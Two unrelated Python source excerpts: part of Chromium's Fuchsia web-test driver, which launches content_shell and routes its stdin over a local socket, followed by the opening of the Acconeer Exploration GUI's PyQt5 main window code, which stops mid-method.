def default_smoke_test_only(self):
return True
def get_target_host(self):
return self._target_host
def get_build_ids_path(self):
package_path = self._path_to_driver()
return os.path.join(os.path.dirname(package_path), 'ids.txt')
class ChromiumFuchsiaDriver(driver.Driver):
def __init__(self, port, worker_number, no_timeout=False):
super(ChromiumFuchsiaDriver, self).__init__(port, worker_number,
no_timeout)
def _initialize_server_process(self, server_name, cmd_line, environment):
self._server_process = self._port.server_process_constructor(
self._port,
server_name,
cmd_line,
environment,
more_logging=self._port.get_option('driver_logging'),
host_ip=self._port._host_ip)
def _base_cmd_line(self):
cmd = [
'run',
'fuchsia-pkg://fuchsia.com/content_shell#meta/content_shell.cmx'
]
if self._port._target_device == 'qemu':
cmd.append('--ozone-platform=headless')
# Use Scenic on AEMU
else:
cmd.extend([
'--ozone-platform=scenic', '--enable-oop-rasterization',
'--use-vulkan', '--enable-gpu-rasterization',
'--force-device-scale-factor=1', '--use-gl=stub',
'--enable-features=UseSkiaRenderer,Vulkan'
])
return cmd
def _command_from_driver_input(self, driver_input):
command = super(ChromiumFuchsiaDriver,
self)._command_from_driver_input(driver_input)
if command.startswith('/'):
relative_test_filename = \
os.path.relpath(command, self._port.web_tests_dir())
command = 'http://127.0.0.1:8000' + WEB_TESTS_PATH_PREFIX + \
'/' + relative_test_filename
return command
# Custom version of ServerProcess that runs processes on a remote device.
class FuchsiaServerProcess(server_process.ServerProcess):
def __init__(self,
port_obj,
name,
cmd,
env=None,
treat_no_data_as_crash=False,
more_logging=False,
host_ip=None):
super(FuchsiaServerProcess, self).__init__(
port_obj, name, cmd, env, treat_no_data_as_crash, more_logging)
self._symbolizer_proc = None
self._host_ip = host_ip or qemu_target.HOST_IP_ADDRESS
def _start(self):
if self._proc:
raise ValueError('%s already running' % self._name)
self._reset()
# Fuchsia doesn't support stdin stream for packaged applications, so the
# stdin stream for content_shell is routed through a separate TCP
# socket. Open a local socket and then pass the address with the port as
# --stdin-redirect parameter. content_shell will connect to this address
# and will use that connection as its stdin stream.
listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_socket.bind(('127.0.0.1', 0))
listen_socket.listen(1)
stdin_port = listen_socket.getsockname()[1]
command = ['%s=%s' % (k, v) for k, v in self._env.items()] + \
self._cmd + \
['--no-sandbox', '--stdin-redirect=%s:%s' %
(self._host_ip, stdin_port)]
proc = self._port.get_target_host().run_command(command)
# Wait for incoming connection from content_shell.
fd = listen_socket.fileno()
read_fds, _, _ = select.select([fd], [], [], PROCESS_START_TIMEOUT)
if fd not in read_fds:
listen_socket.close()
proc.kill()
raise driver.DeviceFailure(
'Timed out waiting connection from content_shell.')
# Python's interfaces for sockets and pipes are different. To masquerade
# the socket as a pipe dup() the file descriptor and pass it to
# os.fdopen().
stdin_socket, _ = listen_socket.accept()
fd = stdin_socket.fileno() # pylint: disable=no-member
stdin_pipe = os.fdopen(os.dup(fd), "w", 0)
stdin_socket.close()
proc.stdin.close()
proc.stdin = stdin_pipe
# Run symbolizer to filter the stderr stream.
self._symbolizer_proc = symbolizer.RunSymbolizer(
proc.stderr, subprocess.PIPE, [self._port.get_build_ids_path()])
proc.stderr = self._symbolizer_proc.stdout
self._set_proc(proc)
def stop(self, timeout_secs=0.0, kill_tree=False):
result = super(FuchsiaServerProcess, self).stop(
timeout_secs, kill_tree)
if self._symbolizer_proc:
self._symbolizer_proc.kill()
return result
|
main.py | import copy
import json
import logging
import os
import re
import signal
import sys
import threading
import time
import traceback
import warnings
import webbrowser
from distutils.version import StrictVersion
import numpy as np
import pyqtgraph as pg
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import (
QApplication,
QCheckBox,
QComboBox,
QFrame,
QLabel,
QLineEdit,
QMainWindow,
QPushButton,
QStackedWidget,
QTabWidget,
QWidget,
)
HERE = os.path.dirname(os.path.realpath(__file__))
sys.path.append(HERE)
sys.path.insert(0, os.path.abspath(os.path.join(HERE, "..")))
sys.path.append(os.path.abspath(os.path.join(HERE, "ml")))
sys.path.append(os.path.abspath(os.path.join(HERE, "elements")))
try:
from acconeer.exptool import SDK_VERSION, clients, configs, recording, utils
from acconeer.exptool.structs import configbase
import data_processing
from helper import (
AdvancedSerialDialog,
BiggerMessageBox,
CollapsibleSection,
Count,
GUIArgumentParser,
HandleAdvancedProcessData,
Label,
LoadState,
SensorSelection,
SessionInfoView,
lib_version_up_to_date,
)
from modules import (
MODULE_INFOS,
MODULE_KEY_TO_MODULE_INFO_MAP,
MODULE_LABEL_TO_MODULE_INFO_MAP,
)
except Exception:
traceback.print_exc()
print("\nPlease update your library with 'python -m pip install -U --user .'")
sys.exit(1)
if "win32" in sys.platform.lower():
import ctypes
myappid = "acconeer.exploration.tool"
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
class GUI(QMainWindow):
DEFAULT_BAUDRATE = 3000000
ACC_IMG_FILENAME = os.path.join(HERE, "elements/acc.png")
LAST_CONF_FILENAME = os.path.join(HERE, "last_config.npy")
LAST_ML_CONF_FILENAME = os.path.join(HERE, "last_ml_config.npy")
sig_scan = pyqtSignal(str, str, object)
sig_sensor_config_pidget_event = pyqtSignal(object)
sig_processing_config_pidget_event = pyqtSignal(object)
def __init__(self, under_test=False):
super().__init__()
self.under_test = under_test
gui_inarg = GUIArgumentParser()
if under_test:
self.args = gui_inarg.parse_args([])
else:
self.args = gui_inarg.parse_args()
self.data = None
self.data_source = None
self.client = None
self.num_recv_frames = 0
self.num_missed_frames = 0
self.measured_update_rate_fc = utils.FreqCounter()
self.reset_missed_frame_text_time = None
self.service_labels = {}
self.service_params = None
self.service_defaults = None
self.advanced_process_data = {"use_data": False, "process_data": None}
self.override_baudrate = None
self.session_info = None
self.threaded_scan = None
self.gui_states = {
"load_state": LoadState.UNLOADED,
"server_connected": False,
"replaying_data": False,
"scan_is_running": False,
"has_config_error": False,
"connection_info": None,
"ml_mode": bool(self.args.machine_learning),
"ml_tab": "main",
"ml_model_loaded": False,
"ml_sensor_settings_locked": False,
"ml_overwrite_settings": False,
}
self.current_data_type = None
self.current_module_label = None
self.canvas = None
self.sensors_available = None
self.basic_sensor_param_count = Count()
self.advanced_sensor_param_count = Count()
self.control_grid_count = Count()
self.param_grid_count = Count(2)
self.sensor_widgets = {}
self.ml_feature_plot_widget = None
self.ml_eval_model_plot_widget = None
self.ml_data = None
self.sig_sensor_config_pidget_event.connect(self.pidget_sensor_config_event_handler)
self.sig_processing_config_pidget_event.connect(
self.pidget_processing_config_event_handler
)
self.module_label_to_sensor_config_map = {}
self.module_label_to_processing_config_map = {}
self.current_module_info = MODULE_INFOS[0]
for mi in MODULE_INFOS:
if mi.sensor_config_class is not None:
self.module_label_to_sensor_config_map[mi.label] = mi.sensor_config_class()
processing_config = self.get_default_processing_config(mi.label)
self.module_label_to_processing_config_map[mi.label] = processing_config
self.setWindowIcon(QIcon(self.ACC_IMG_FILENAME))
self.main_widget = QtWidgets.QSplitter(self.centralWidget())
self.main_widget.setStyleSheet("QSplitter::handle{background: lightgrey}")
self.main_widget.setFrameStyle(QFrame.Panel | QFrame.Sunken)
self.setCentralWidget(self.main_widget)
self.init_pyqtgraph()
self.init_labels()
self.init_textboxes()
self.init_buttons()
self.init_dropdowns()
self.init_checkboxes()
self.init_sublayouts()
self.init_panel_scroll_area()
self.init_statusbar()
self.init_pidgets()
if self.get_gui_state("ml_mode"):
self.init_machine_learning()
self.main_widget.addWidget(self.ml_parent_widget)
self.canvas_layout = self.tabs["collect"].layout
else:
self.canvas_widget = QFrame(self.main_widget)
self.canvas_layout = QtWidgets.QVBoxLayout(self.canvas_widget)
self.main_widget.addWidget(self.panel_scroll_area)
self.update_canvas(force_update=True)
self.resize(1200, 800)
self.setWindowTitle("Acconeer Exploration GUI")
self.show()
self.start_up()
lib_version_up_to_date(gui_handle=self)
self.set_gui_state(None, None)
self.radar = data_processing.DataProcessing()
timer = QtCore.QTimer(self)
timer.timeout.connect(self.plot_timer_fun)
timer.start(15)
self.plot_queue = []
def init_pyqtgraph(self):
pg.setConfigOption("background", "#f0f0f0")
pg.setConfigOption("foreground", "k")
pg.setConfigOption("leftButtonPan", False)
pg.setConfigOptions(antialias=True)
def init_labels(self):
# key: (text)
label_info = {
"sensor": ("Sensor",),
"sweep_buffer": ("Max buffered frames",),
"data_source": ("",),
"stored_frames": ("",),
"interface": ("Interface",),
"sweep_info": ("",),
"measured_update_rate": ("",),
"data_warnings": ("",),
"rssver": ("",),
"libver": ("",),
"unsupported_mode": ("Mode not supported by this module",),
}
self.labels = {}
for key, (text,) in label_info.items():
lbl = QLabel(self)
lbl.setText(text)
self.labels[key] = lbl
for k in ["data_warnings", "unsupported_mode"]:
lbl = self.labels[k]
lbl.setStyleSheet("color: #ff0000")
lbl.setVisible(False)
def init_textboxes(self):
# key: (text)
textbox_info = {
"host": ("192.168.1.100", True),
"sweep_buffer": ("1000", True),
"stored_frames": ("0", False),
"sweep_buffer_ml": ("unlimited", False),
}
self.textboxes = {}
for key, (text, enabled) in textbox_info.items():
self.textboxes[key] = QLineEdit(self)
self.textboxes[key].setText(text)
self.textboxes[key].setEnabled(enabled)
self.textboxes["sweep_buffer_ml"].setVisible(False)
def init_checkboxes(self):
# text, status, visible, enabled, function
checkbox_info = {
"verbose": ("Verbose logging", False, True, True, self.set_log_level),
}
self.checkboxes = {}
for key, (text, status, visible, enabled, fun) in checkbox_info.items():
cb = QCheckBox(text, self)
cb.setChecked(status)
cb.setVisible(visible)
cb.setEnabled(enabled)
if fun:
cb.stateChanged.connect(fun)
self.checkboxes[key] = cb
def init_graphs(self, refresh=False):
processing_config = self.get_default_processing_config()
if self.current_module_info.module is None:
canvas = Label(self.ACC_IMG_FILENAME)
self.refresh_pidgets()
return canvas
canvas = pg.GraphicsLayoutWidget()
if not refresh:
if not (processing_config and isinstance(processing_config, dict)):
self.service_params = None
self.service_defaults = None
else:
self.service_params = processing_config
self.service_defaults = copy.deepcopy(self.service_params)
self.add_params(self.service_params)
self.reload_pg_updater(canvas=canvas)
self.refresh_pidgets()
return canvas
def reload_pg_updater(self, canvas=None, session_info=None):
if canvas is None:
canvas = pg.GraphicsLayoutWidget()
self.swap_canvas(canvas)
sensor_config = self.get_sensor_config()
processing_config = self.update_service_params()
if session_info is None:
session_info = clients.MockClient().setup_session(sensor_config, check_config=False)
self.service_widget = self.current_module_info.module.PGUpdater(
sensor_config, processing_config, session_info
)
self.service_widget.setup(canvas)
def init_pidgets(self):
self.last_sensor_config = None
for sensor_config in self.module_label_to_sensor_config_map.values():
sensor_config._event_handlers.add(self.pidget_sensor_config_event_handler)
pidgets = sensor_config._create_pidgets()
for pidget in pidgets:
if pidget is None:
continue
category = pidget.param.category
if category == configbase.Category.ADVANCED:
grid = self.advanced_sensor_config_section.grid
count = self.advanced_sensor_param_count
else:
grid = self.basic_sensor_config_section.grid
count = self.basic_sensor_param_count
grid.addWidget(pidget, count.val, 0, 1, 2)
count.post_incr()
self.last_processing_config = None
for processing_config in self.module_label_to_processing_config_map.values():
if not isinstance(processing_config, configbase.Config):
continue
processing_config._event_handlers.add(self.pidget_processing_config_event_handler)
pidgets = processing_config._create_pidgets()
for pidget in pidgets:
if pidget is None:
continue
if pidget.param.category == configbase.Category.ADVANCED:
grid = self.advanced_processing_config_section.grid
count = self.param_grid_count
else:
grid = self.basic_processing_config_section.grid
count = self.param_grid_count
grid.addWidget(pidget, count.val, 0, 1, 2)
count.post_incr()
self.refresh_pidgets()
self.set_gui_state(None, None)
def refresh_pidgets(self):
self.refresh_sensor_pidgets()
self.refresh_processing_pidgets()
self.update_pidgets_on_event()
def refresh_sensor_pidgets(self):
sensor_config = self.get_sensor_config()
if self.last_sensor_config != sensor_config:
if self.last_sensor_config is not None:
self.last_sensor_config._state = configbase.Config.State.UNLOADED
self.last_sensor_config = sensor_config
if sensor_config is None:
self.basic_sensor_config_section.setVisible(False)
self.advanced_sensor_config_section.setVisible(False)
return
sensor_config._state = configbase.Config.State.LOADED
has_basic_params = has_advanced_params = False
for param in sensor_config._get_params():
if param.visible:
if param.category == configbase.Category.ADVANCED:
has_advanced_params = True
else:
has_basic_params = True
if self.get_gui_state("ml_tab") in ["main", "feature_select", "eval"]:
self.basic_sensor_config_section.setVisible(has_basic_params)
self.advanced_sensor_config_section.setVisible(has_advanced_params)
def refresh_processing_pidgets(self):
processing_config = self.get_processing_config()
if self.last_processing_config != processing_config:
if isinstance(self.last_processing_config, configbase.Config):
self.last_processing_config._state = configbase.Config.State.UNLOADED
self.last_processing_config = processing_config
if processing_config is None:
self.basic_processing_config_section.hide()
self.advanced_processing_config_section.hide()
return
# TODO: remove the follow check when migration to configbase is done
if not isinstance(processing_config, configbase.Config):
return
processing_config._state = configbase.Config.State.LOADED
has_basic_params = has_advanced_params = False
for param in processing_config._get_params():
if param.visible:
if param.category == configbase.Category.ADVANCED:
has_advanced_params = True
else:
has_basic_params = True
if self.get_gui_state("ml_tab") == "main":
self.basic_processing_config_section.setVisible(has_basic_params)
self.advanced_processing_config_section.setVisible(has_advanced_params)
def pidget_sensor_config_event_handler(self, sensor_config):
if threading.current_thread().name != "MainThread":
self.sig_sensor_config_pidget_event.emit(sensor_config)
return
self.update_pidgets_on_event(sensor_config=sensor_config)
if self.get_gui_state("ml_mode"):
self.feature_sidepanel.textboxes["update_rate"].setText(str(sensor_config.update_rate))
self.feature_select.check_limits()
def pidget_processing_config_event_handler(self, processing_config):
if threading.current_thread().name != "MainThread":
self.sig_processing_config_pidget_event.emit(processing_config)
return
# Processor
try:
if isinstance(self.radar.external, self.current_module_info.processor):
self.radar.external.update_processing_config(processing_config)
except AttributeError:
pass
# Plot updater
try:
self.service_widget.update_processing_config(processing_config)
except AttributeError:
pass
self.update_pidgets_on_event(processing_config=processing_config)
def update_pidgets_on_event(self, sensor_config=None, processing_config=None):
if sensor_config is None:
sensor_config = self.get_sensor_config()
if sensor_config is None:
return
if processing_config is None:
processing_config = self.get_processing_config()
if hasattr(processing_config, "check_sensor_config"):
pass_on_alerts = processing_config.check_sensor_config(sensor_config)
else:
pass_on_alerts = {
"processing": [],
"sensor": [],
}
all_alerts = []
alerts = sensor_config._update_pidgets(additional_alerts=pass_on_alerts["sensor"])
all_alerts.extend(alerts)
if isinstance(processing_config, configbase.Config):
alerts = processing_config._update_pidgets(
additional_alerts=pass_on_alerts["processing"]
)
all_alerts.extend(alerts)
has_error = any([a.severity == configbase.Severity.ERROR for a in all_alerts])
self.set_gui_state("has_config_error", has_error)
def init_dropdowns(self):
self.module_dd = QComboBox(self)
for module_info in MODULE_INFOS:
if self.get_gui_state("ml_mode"):
if module_info.allow_ml:
self.module_dd.addItem(module_info.label)
else:
self.module_dd.addItem(module_info.label)
self.module_dd.currentIndexChanged.connect(self.update_canvas)
self.interface_dd = QComboBox(self)
self.interface_dd.addItem("Socket")
self.interface_dd.addItem("Serial")
self.interface_dd.addItem("SPI")
self.interface_dd.addItem("Simulated")
self.interface_dd.currentIndexChanged.connect(self.update_interface)
self.ports_dd = QComboBox(self)
self.ports_dd.hide()
self.update_ports()
def set_multi_sensors(self):
module_multi_sensor_support = self.current_module_info.multi_sensor
if self.get_gui_state("load_state") == LoadState.LOADED:
source_sensors = json.loads(self.data.sensor_config_dump)["sensor"]
else:
source_sensors = self.sensors_available
for name in self.sensor_widgets:
self.sensor_widgets[name].set_multi_sensor_support(
source_sensors, module_multi_sensor_support
)
def set_sensors(self, sensors):
for name in self.sensor_widgets:
self.sensor_widgets[name].set_sensors(sensors)
def get_sensors(self, widget_name=None):
if widget_name is None:
widget_name = "main"
sensors = self.sensor_widgets[widget_name].get_sensors()
return sensors
def update_ports(self):
try:
opsys = os.uname()
in_wsl = "microsoft" in opsys.release.lower() and "linux" in opsys.sysname.lower()
except Exception:
in_wsl = False
select = -1
port_tag_tuples = utils.get_tagged_serial_ports()
if not in_wsl and os.name == "posix":
ports = []
for i, (port, tag) in enumerate(port_tag_tuples):
tag_string = ""
if tag:
select = i
tag_string = " ({})".format(tag)
ports.append(port + tag_string)
else:
ports = [port for port, *_ in port_tag_tuples]
try:
if in_wsl:
print("WSL detected. Limiting serial ports")
ports_reduced = []
for p in ports:
if int(re.findall(r"\d+", p)[0]) < 20:
ports_reduced.append(p)
ports = ports_reduced
except Exception:
pass
self.ports_dd.clear()
self.ports_dd.addItems(ports)
if select >= 0:
self.ports_dd.setCurrentIndex(select)
def advanced_port(self):
dialog = AdvancedSerialDialog(self.override_baudrate, self)
ret = dialog.exec_()
if ret == QtWidgets.QDialog.Accepted:
self.override_baudrate = dialog.get_state()
dialog.deleteLater()
def start_btn_clicked(self):
if self.get_gui_state("load_state") == LoadState.LOADED:
self.data = None
self.session_info_view.update(None)
self.set_gui_state("load_state", LoadState.UNLOADED)
else:
self.start_scan()
def save_file_btn_clicked(self):
self.save_scan(self.data)
def replay_btn_clicked(self):
self.load_scan(restart=True)
def init_buttons(self):
# key: text, function, enabled, hidden, group
button_info = {
"start": ("Start", self.start_btn_clicked, False, False, "scan"),
"connect": ("Connect", self.connect_to_server, True, False, "connection"),
"stop": ("Stop", self.stop_scan, False, False, "scan"),
"load_scan": ("Load from file", self.load_scan, True, False, "scan"),
"save_scan": ("Save to file", self.save_file_btn_clicked, False, False, "scan"),
"replay_buffered": (
"Replay",
self.replay_btn_clicked,
False,
False,
"scan",
),
"scan_ports": ("Scan ports", self.update_ports, True, True, "connection"),
"sensor_defaults": (
"Defaults",
self.sensor_defaults_handler,
False,
False,
"sensor",
),
"service_defaults": (
"Defaults",
self.service_defaults_handler,
True,
False,
"service",
),
"service_help": (
"?",
self.service_help_button_handler,
True,
False,
"service",
),
"advanced_defaults": (
"Defaults",
self.service_defaults_handler,
True,
False,
"advanced",
),
"save_process_data": (
"Save process data",
lambda: self.handle_advanced_process_data("save"),
True,
True,
"advanced",
),
"load_process_data": (
"Load process data",
lambda: self.handle_advanced_process_data("load"),
True,
True,
"advanced",
),
"advanced_port": (
"Advanced port settings",
self.advanced_port,
True,
True,
"connection",
),
}
self.buttons = {}
for key, (text, fun, enabled, hidden, _) in button_info.items():
btn = QPushButton(text, self)
btn.clicked.connect(fun)
btn.setEnabled(enabled)
btn.setHidden(hidden)
btn.setMinimumWidth(150)
self.buttons[key] = btn
def init_sublayouts(self):
self.main_sublayout = QtWidgets.QGridLayout()
self.main_sublayout.setContentsMargins(0, 3, 0, 3)
self.main_sublayout.setSpacing(0)
self.server_section = CollapsibleSection("Connection", is_top=True)
self.main_sublayout.addWidget(self.server_section, 0, 0)
self.server_section.grid.addWidget(self.labels["interface"], 0, 0)
self.server_section.grid.addWidget(self.interface_dd, 0, 1)
self.server_section.grid.addWidget(self.ports_dd, 1, 0)
self.server_section.grid.addWidget(self.textboxes["host"], 1, 0, 1, 2)
self.server_section.grid.addWidget(self.buttons["scan_ports"], 1, 1)
self.server_section.grid.addWidget(self.buttons["advanced_port"], 2, 0, 1, 2)
self.server_section.grid.addWidget(self.buttons["connect"], 3, 0, 1, 2)
self.server_section.grid.addWidget(self.labels["rssver"], 4, 0, 1, 2)
self.control_section = CollapsibleSection("Scan controls")
self.main_sublayout.addWidget(self.control_section, 1, 0)
c = self.control_grid_count
# Sublayout for service dropdown and a small help button.
service_and_help_layout = QtWidgets.QHBoxLayout()
service_and_help_layout.addWidget(self.module_dd)
service_and_help_layout.addWidget(self.buttons["service_help"])
self.buttons["service_help"].setFixedWidth(30)
self.control_section.grid.addLayout(service_and_help_layout, c.pre_incr(), 0, 1, 2)
self.control_section.grid.addWidget(self.labels["unsupported_mode"], c.pre_incr(), 0, 1, 2)
self.control_section.grid.addWidget(self.buttons["start"], c.pre_incr(), 0)
self.control_section.grid.addWidget(self.buttons["stop"], c.val, 1)
self.control_section.grid.addWidget(self.buttons["save_scan"], c.pre_incr(), 0)
self.control_section.grid.addWidget(self.buttons["load_scan"], c.val, 1)
self.control_section.grid.addWidget(self.buttons["replay_buffered"], c.pre_incr(), 0, 1, 2)
self.control_section.grid.addWidget(self.labels["data_source"], c.pre_incr(), 0, 1, 2)
self.control_section.grid.addWidget(self.labels["sweep_buffer"], c.pre_incr(), 0)
self.control_section.grid.addWidget(self.textboxes["sweep_buffer"], c.val, 1)
self.control_section.grid.addWidget(self.textboxes["sweep_buffer_ml"], c.val, 1)
self.control_section.grid.addWidget(self.labels["stored_frames"], c.pre_incr(), 0)
self.control_section.grid.addWidget(self.textboxes["stored_frames"], c.val, 1)
self.basic_sensor_config_section = CollapsibleSection("Sensor settings")
self.main_sublayout.addWidget(self.basic_sensor_config_section, 4, 0)
c = self.basic_sensor_param_count
self.basic_sensor_config_section.grid.addWidget(
self.buttons["sensor_defaults"], c.post_incr(), 0, 1, 2
)
self.basic_sensor_config_section.grid.addWidget(self.labels["sensor"], c.val, 0)
sensor_selection = SensorSelection(error_handler=self.error_message)
self.basic_sensor_config_section.grid.addWidget(sensor_selection, c.post_incr(), 1)
self.sensor_widgets["main"] = sensor_selection
self.advanced_sensor_config_section = CollapsibleSection(
"Advanced sensor settings", init_collapsed=True
)
self.main_sublayout.addWidget(self.advanced_sensor_config_section, 5, 0)
self.session_info_section = CollapsibleSection(
"Session information (sensor metadata)", init_collapsed=True
)
self.main_sublayout.addWidget(self.session_info_section, 6, 0)
self.session_info_view = SessionInfoView(self.session_info_section)
self.session_info_section.grid.addWidget(self.session_info_view, 0, 0, 1, 2)
self.basic_processing_config_section = CollapsibleSection("Processing settings")
self.main_sublayout.addWidget(self.basic_processing_config_section, 7, 0)
self.basic_processing_config_section.grid.addWidget(
self.buttons["service_defaults"], 0, 0, 1, 2
)
self.advanced_processing_config_section = CollapsibleSection(
"Advanced processing settings", init_collapsed=True
)
self.main_sublayout.addWidget(self.advanced_processing_config_section, 8, 0)
self.advanced_processing_config_section.grid.addWidget(
self.buttons["advanced_defaults"], 0, 0, 1, 2
)
self.advanced_processing_config_section.grid.addWidget(
self.buttons["load_process_data"], 1, 0
)
self.advanced_processing_config_section.grid.addWidget(
self.buttons["save_process_data"], 1, 1
)
self.main_sublayout.setRowStretch(9, 1)
def init_panel_scroll_area(self):
self.panel_scroll_area = QtWidgets.QScrollArea()
self.panel_scroll_area.setFrameShape(QFrame.NoFrame)
self.panel_scroll_area.setMinimumWidth(350)
self.panel_scroll_area.setMaximumWidth(600)
self.panel_scroll_area.setWidgetResizable(True)
self.panel_scroll_area.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.panel_scroll_area.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.panel_scroll_area.horizontalScrollBar().setEnabled(False)
self.panel_scroll_area_widget = QStackedWidget(self.panel_scroll_area)
self.panel_scroll_area.setWidget(self.panel_scroll_area_widget)
self.main_sublayout_widget = QWidget(self.panel_scroll_area_widget)
self.main_sublayout_widget.setLayout(self.main_sublayout)
self.panel_scroll_area_widget.addWidget(self.main_sublayout_widget)
self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
def init_statusbar(self):
self.statusBar().showMessage("Not connected")
self.labels["sweep_info"].setFixedWidth(220)
self.labels["sweep_info"].setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignRight)
self.labels["measured_update_rate"].setToolTip("Measured update rate")
self.labels["measured_update_rate"].setFixedWidth(120)
self.statusBar().addPermanentWidget(self.labels["data_warnings"])
self.statusBar().addPermanentWidget(self.labels["sweep_info"])
self.statusBar().addPermanentWidget(self.labels["measured_update_rate"])
self.statusBar().addPermanentWidget(self.labels["libver"])
self.statusBar().addPermanentWidget(self.checkboxes["verbose"])
self.statusBar().setStyleSheet("QStatusBar{border-top: 1px solid lightgrey;}")
self.statusBar().show()
def init_machine_learning(self):
if self.get_gui_state("ml_mode"):
import feature_processing
import ml_gui_elements as ml_gui
import ml_state
self.ml_elements = ml_gui
self.ml_external = feature_processing.DataProcessor
self.ml_module = feature_processing
self.ml_state = ml_state.MLState(self)
self.ml_info_widget = ml_state.MLStateWidget(self)
self.ml_state.add_status_widget(self.ml_info_widget)
self.ml_model_ops = ml_gui.ModelOperations(self)
self.init_tabs()
self.init_ml_panels()
def init_tabs(self):
self.ml_parent_widget = QtWidgets.QSplitter(self.main_widget)
self.ml_parent_widget.resize(300, 200)
self.ml_parent_widget.setOrientation(QtCore.Qt.Vertical)
self.ml_parent_widget.setStyleSheet("QSplitter::handle{background: lightgrey}")
self.ml_parent_widget.setFrameStyle(QFrame.Panel | QFrame.Sunken)
self.tab_parent = QTabWidget(self.ml_parent_widget)
self.tab_parent.setTabPosition(QTabWidget.South)
self.ml_parent_widget.addWidget(self.tab_parent)
self.ml_parent_widget.addWidget(self.ml_info_widget)
self.tabs = {
"collect": (QWidget(self.tab_parent), "Select service"),
"feature_select": (QWidget(self.tab_parent), "Feature configuration"),
"feature_extract": (QWidget(self.tab_parent), "Feature extraction"),
"feature_inspect": (QWidget(self.tab_parent), "Feature inspection"),
"model_select": (QWidget(self.tab_parent), "Model parameters"),
"train": (QWidget(self.tab_parent), "Train Model"),
"eval": (QWidget(self.tab_parent), "Use Model"),
}
self.tabs_text_to_key = {
"Select service": "main",
"Feature configuration": "feature_select",
"Feature extraction": "feature_extract",
"Feature inspection": "feature_inspect",
"Model parameters": "model_select",
"Train Model": "train",
"Use Model": "eval",
}
for key, (tab, label) in self.tabs.items():
self.tab_parent.addTab(tab, label)
tab.layout = QtWidgets.QVBoxLayout()
tab.setLayout(tab.layout)
tab.setObjectName("child")
tab.setStyleSheet("QWidget#child{background: #f0f0f0}")
self.tabs[key] = tab
self.tab_parent.currentChanged.connect(self.tab_changed)
self.feature_select = self.ml_elements.FeatureSelectFrame(
self.main_widget,
gui_handle=self,
)
self.tabs["feature_select"].layout.addWidget(self.feature_select)
self.feature_extract = self.ml_elements.FeatureExtractFrame(
self.main_widget,
gui_handle=self,
)
self.tabs["feature_extract"].layout.addWidget(self.feature_extract)
self.feature_inspect = self.ml_elements.FeatureInspectFrame(
self.main_widget,
gui_handle=self,
)
self.tabs["feature_inspect"].layout.addWidget(self.feature_inspect)
self.model_select = self.ml_elements.ModelSelectFrame(
self.main_widget,
gui_handle=self,
)
self.tabs["model_select"].layout.addWidget(self.model_select)
self.training = self.ml_elements.TrainingFrame(self.main_widget, gui_handle=self)
self.tabs["train"].layout.addWidget(self.training)
self.eval_model = self.ml_elements.EvalFrame(self.main_widget, gui_handle=self)
self.tabs["eval"].layout.addWidget(self.eval_model)
def init_ml_panels(self):
# feature select/extract/inspect side panel
self.feature_section = CollapsibleSection("Feature settings", init_collapsed=False)
self.main_sublayout.addWidget(self.feature_section, 3, 0)
self.feature_sidepanel = self.ml_elements.FeatureSidePanel(
self.panel_scroll_area_widget, self
)
self.feature_section.grid.addWidget(self.feature_sidepanel, 0, 0, 1, 2)
self.feature_section.hide()
self.feature_section.button_event(override=False)
# training panel
self.training_sidepanel = self.ml_elements.TrainingSidePanel(
self.panel_scroll_area_widget, self
)
self.panel_scroll_area_widget.addWidget(self.training_sidepanel)
def tab_changed(self, index):
tab = self.tab_parent.tabText(index)
self.set_gui_state("ml_tab", self.tabs_text_to_key[tab])
def enable_tabs(self, enable):
if not self.get_gui_state("ml_mode"):
return
current_tab = self.tab_parent.currentIndex()
for i in range(len(self.tabs)):
if i != current_tab:
self.tab_parent.setTabEnabled(i, enable)
def add_params(self, params, start_up_mode=None):
if params is None:
params = {}
self.buttons["load_process_data"].hide()
self.buttons["save_process_data"].hide()
for mode in self.service_labels:
for param_key in self.service_labels[mode]:
for element in self.service_labels[mode][param_key]:
if element in ["label", "box", "checkbox", "button"]:
self.service_labels[mode][param_key][element].setVisible(False)
if start_up_mode is None:
mode = self.current_module_label
set_visible = True
else:
mode = start_up_mode
set_visible = False
if mode not in self.service_labels:
self.service_labels[mode] = {}
advanced_available = False
for param_key, param_dict in params.items():
if param_key not in self.service_labels[mode]:
param_gui_dict = {}
self.service_labels[mode][param_key] = param_gui_dict
advanced_available = bool(param_dict.get("advanced"))
if advanced_available:
grid = self.advanced_processing_config_section.grid
else:
grid = self.basic_processing_config_section.grid
param_gui_dict["advanced"] = advanced_available
if "send_process_data" == param_key:
data_buttons = param_gui_dict
data_buttons["load_button"] = self.buttons["load_process_data"]
data_buttons["save_button"] = self.buttons["save_process_data"]
data_buttons["load_text"] = "Load " + param_dict["text"]
data_buttons["save_text"] = "Save " + param_dict["text"]
data_buttons["load_button"].setText(data_buttons["load_text"])
data_buttons["save_button"].setText(data_buttons["save_text"])
data_buttons["load_button"].setVisible(set_visible)
data_buttons["save_button"].setVisible(set_visible)
elif isinstance(param_dict["value"], bool):
param_gui_dict["checkbox"] = QCheckBox(param_dict["name"], self)
param_gui_dict["checkbox"].setChecked(param_dict["value"])
grid.addWidget(param_gui_dict["checkbox"], self.param_grid_count.val, 0, 1, 2)
elif param_dict["value"] is not None:
param_gui_dict["label"] = QLabel(self)
param_gui_dict["label"].setMinimumWidth(125)
param_gui_dict["label"].setText(param_dict["name"])
param_gui_dict["box"] = QLineEdit(self)
param_gui_dict["box"].setText(str(param_dict["value"]))
param_gui_dict["limits"] = param_dict["limits"]
param_gui_dict["default"] = param_dict["value"]
grid.addWidget(param_gui_dict["label"], self.param_grid_count.val, 0)
grid.addWidget(param_gui_dict["box"], self.param_grid_count.val, 1)
param_gui_dict["box"].setVisible(set_visible)
else: # param is only a label
param_gui_dict["label"] = QLabel(self)
param_gui_dict["label"].setText(str(param_dict["text"]))
grid.addWidget(param_gui_dict["label"], self.param_grid_count.val, 0, 1, 2)
self.param_grid_count.post_incr()
else:
param_gui_dict = self.service_labels[mode][param_key]
for element in param_gui_dict:
if element in ["label", "box", "checkbox"]:
